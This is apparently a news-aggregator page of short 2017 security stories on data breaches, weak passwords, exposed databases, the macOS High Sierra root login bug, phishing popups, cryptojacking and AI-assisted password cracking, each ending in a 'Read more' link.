Ancestry.com has confirmed that a leaky server on RootsWeb, its free community-driven genealogical website, inadvertently exposed a file containing 300,000 usernames, email addresses and passwords online.
In a statement issued over the weekend, Ancestry's chief information security officer Tony Blackham said a security researcher notified the company of the unsecured file on 20 December. Troy Hunt, security expert and creator of the data breach repository "HaveIBeenPwned.com" reported the existence of the file to Ancestry and said the data was compromised in 2015.Read more
For the second year in a row, "123456" remained the top password among the millions of cleartext passwords exposed online thanks to data breach incidents at various providers. While having "123456" as your password is quite bad, the other terms found on a list of Top 100 Worst Passwords of 2017 are just as distressing and regretful.
Some of these include an extensive collection of sports terms (football, baseball, soccer, hockey, Lakers, jordan23, golfer, Rangers, Yankees), car brands (Mercedes, Corvette, Ferrari, Harley), and various expressions (iloveyou, letmein, whatever, blahblah).Read more
An Amazon AWS server believed to contain files on all of California’s registered voters was left exposed this year due to a misconfigured database, according to researchers at the Kromtech Security Center. The database was later stolen by cybercriminals demanding a ransom only payable in bitcoin.
Kromtech told that it collected samples from the database earlier this year while examining thousands of servers left publicly exposed. Each of the servers had installed a database platform known as MongoDB, which was widely misconfigured and vulnerable to attack. Kromtech discovered what appeared to be 4 GB of voter files linked to the State of California.Read more
If you are running Windows 10 on your PC, then there are chances that your computer contains a pre-installed 3rd-party password manager app that lets attackers steal all your credentials remotely. Starting from Windows 10 Anniversary Update, Microsoft added a new feature called Content Delivery Manager that silently installs new "suggested apps" without asking for users’ permission.
According to a blog post published Friday on Chromium Blog, Google Project Zero researcher Tavis Ormandy said he found a pre-installed famous password manager, called "Keeper," on his freshly installed Windows 10 system which he downloaded directly from the Microsoft Developer Network.Read more
If you're running macOS High Sierra, don't let anyone near your Apple Mac. It's possible for anyone to login to the Mac and get the admin level of access to change passwords, get access to all data on the main account and lock the original user out.
Fortunately, there's a fix that should solve the problem, even as Apple works to patch. First, the bug. In what may go down as one of the most embarrassing vulnerabilities in Apple history, all a "hacker" needs to do is sign in as an "Other" user, type in "root" for a username and no password. Then they're in. Experts tested the vulnerability and found it wide open, allowing a change of passwords for other accounts on the Mac.Read more
One day, your household items and accessories could become a new way to authenticate yourself online, according to researchers. Many websites and online services are now enforcing or at least offering two-factor authentication (2FA) as a way to enhance the security of your accounts.
We all know passwords are less than ideal these days, being susceptible to brute-force hacking as many of us use simple, repetitive phrases -- not to mention the flood of data leaks taking place every day -- and so other methods are now needed. Two-factor authentication utilizes a second method of verification to check someone's identity.Read more
One of iOS' rougher edges are the popups it produces on a regular but seemingly random basis. These popups require users to enter their Apple ID before they can install or update an app or complete some other mundane task.
The prompts have grown so common most people don't think twice about them. Mobile app developer Felix Krause makes a compelling case that these popups represent a potential security hole through which attackers can steal user credentials. In a blog post published Tuesday, he showed side-by-side comparisons, pictured above, of an official popup produced by iOS and a proof-of-concept phishing popup.Read more
Money may not grow on trees, but apparently, it can grow in Amazon Web Services (AWS).
A report from the security intelligence group RedLock found at least two companies which had their AWS cloud services compromised by hackers who wanted nothing more than to use the computer power to mine the cryptocurrency bitcoin. The hackers ultimately got access to Amazon's cloud servers after discovering that their administration consoles weren't password protected. "Upon deeper analysis, the team discovered that hackers were executing a bitcoin mining command from one of the Kubernetes containers," reads the RedLock report.Read more
Disqus has confirmed its web commenting system was hacked. The company, which builds and provides a web-based comment plugin for news websites, said that hackers stole more than 17.5 million email addresses in a data breach in July 2012.
About a third of those accounts contained passwords which has largely been deprecated in recent years in favor of stronger password scramblers. The data also contained sign-up dates and the date of the last login. Some of the exposed user information dates back to 2007. Many of the accounts don't have passwords because they signed up to the commenting tool using a third-party service.Read more
Last week, the credit reporting agency Equifax announced that malicious hackers had leaked the personal information of 143 million people in their system. That’s reason for concern, of course, but if a hacker wants to access your online data by simply guessing your password, you’re probably toast in less than an hour.
Now, there’s more bad news: Scientists have harnessed the power of artificial intelligence to create a program that, combined with existing tools, figured more than a quarter of the passwords from a set of more than 43 million LinkedIn profiles. Yet the researchers say the technology may also be used to beat baddies at their own game.Read more